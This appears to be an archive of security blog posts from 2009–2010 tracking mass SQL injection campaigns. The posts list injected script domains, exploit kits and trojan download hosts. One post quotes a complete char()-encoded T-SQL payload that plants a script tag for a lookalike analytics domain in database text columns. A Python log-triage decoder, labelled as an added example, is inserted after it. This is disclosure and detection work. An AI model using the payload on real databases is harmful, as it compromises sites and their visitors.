nutcountry.ru

Posted in sql injection on August 2, 2010 by s3cu

sql-injection of iframe links – http://nutcountry.ru:8080/index.php?pid=13

The domain is currently not resolvable.

google-analytiics.com

Posted in sql injection on January 15, 2010 by s3cu

Notice the two ‘i’s in the domain?

The SQL injection attack comes in the form (one expression, continued on the next line):

set+variable=cast(variable+as+varchar(8000))%2Bcast(
char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))
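To triage such a request in web-server or WAF logs, here is an added Python example (my own, not from this post) that flags the cast/char concatenation shape and decodes the char() chain back into the injected markup so the script source can be blocklisted; the sample fragment is constructed from the one quoted above, with the trailing char(0) padding shortened:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample (not copied from a live log): the query-string fragment
# quoted above, with the long run of trailing char(0) padding shortened to three.
SAMPLE = (
    "set+variable=cast(variable+as+varchar(8000))%2Bcast("
    "char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)"
    "%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)"
    "%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)"
    "%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)"
    "%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)"
    "%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)"
    "%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)"
    "%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)"
    "%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)"
    "%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)"
    "%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)"
    "%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)"
    "%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))"
)

# \b keeps "varchar(8000)" from being read as char(8000).
CHAR_RE = re.compile(r"\bchar\((\d+)\)", re.IGNORECASE)
# Shape of the mass-injection payload: cast(col as varchar(N)) + cast(char(...)...)
SHAPE_RE = re.compile(
    r"cast\(\s*\w+\s+as\s+varchar\(\d+\)\s*\)\s*\+\s*cast\(\s*char\(", re.IGNORECASE
)

def looks_like_mass_injection(fragment: str) -> bool:
    """True if a URL-encoded query fragment has the cast/char concatenation shape."""
    return SHAPE_RE.search(unquote_plus(fragment)) is not None

def decode_char_payload(fragment: str) -> str:
    """URL-decode the fragment, then turn the char(N)+char(N)+... chain into text.
    T-SQL char(060) is decimal 60 (no octal), so int() is the right conversion."""
    decoded = unquote_plus(fragment)
    text = "".join(chr(int(n)) for n in CHAR_RE.findall(decoded))
    return text.rstrip("\x00")  # the char(0) run only pads the varchar

def extract_script_sources(html: str) -> list[str]:
    """Pull src= URLs out of the decoded markup, for blocklists or IOC matching."""
    return re.findall(r'src="([^"]+)"', html, re.IGNORECASE)

if __name__ == "__main__":
    print(looks_like_mass_injection(SAMPLE))
    payload = decode_char_payload(SAMPLE)
    print(payload)
    print(extract_script_sources(payload))
```

Run over a request log, the shape check selects candidate lines and the decoder shows what each would have appended to every varchar column; the extracted host is what to compare against the real analytics domain.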


z360.net/a.js

Posted in sql injection on September 2, 2009 by s3cu

This injected script also has several associated domains:

  • dd45h.8866.org/fkzd/16.htm
  • wm.1kfie.cn/x150/xx.html

One of the exploits downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]

k.18xn.com/x.js

Posted in sql injection on September 1, 2009 by s3cu

Active SQL injection attack.

Injected scripts and exploits iframe to several URLs such as:

The scripts generate some form of ‘time-based’ parameter that is probably only valid for a brief period.

The trojan downloader from http://www.haerh.info gets a list of malicious programs from http://www.gehae.info/2.txt

a0v.org/x.js

Posted in sql injection on July 23, 2009 by s3cu

Another round of SQL injection attacks.

x.js calls iframe src http://www.jejsaj.com/ya/index.html

jejsaj.com hosts various exploits targeting, among others:

  • OWC 0-day
  • RealPlayer
  • msvidctl.dll

The exploits download trojans from http://www.wowand.com

f1y.in/j.js

Posted in sql injection on July 11, 2009 by s3cu

Another round of SQL injection attempts.

Update: beware of this malicious script as it is making use of OWC 0-day.
Ref – http://isc.sans.org/diary.html?storyid=6811

218.213.77.96/a.js

Posted in sql injection on May 28, 2009 by s3cu

A recent round of SQL-injected links.

3b3.org/c.js

Posted in sql injection on April 16, 2009 by s3cu

This SQL-injected script src has been around for some time.

The interesting point of this script is that it behaves differently if the injected site is from “.gov.cn” or “.edu.cn”.

cn0093.cn/v.js

Posted in sql injection on March 9, 2009 by s3cu

Following the previous post, a new injected script has emerged that resolves to the same IP.

v.js retrieves another iframe src http://www.vieio.cn/i.htm.

This exploit kit tries to avoid detection by splitting each exploit into two files, one .htm and one .js.

tsnse.cn/i.js

Posted in sql injection on March 5, 2009 by s3cu

This SQL-injected script calls iframe http://www.gomne.cn/yh.htm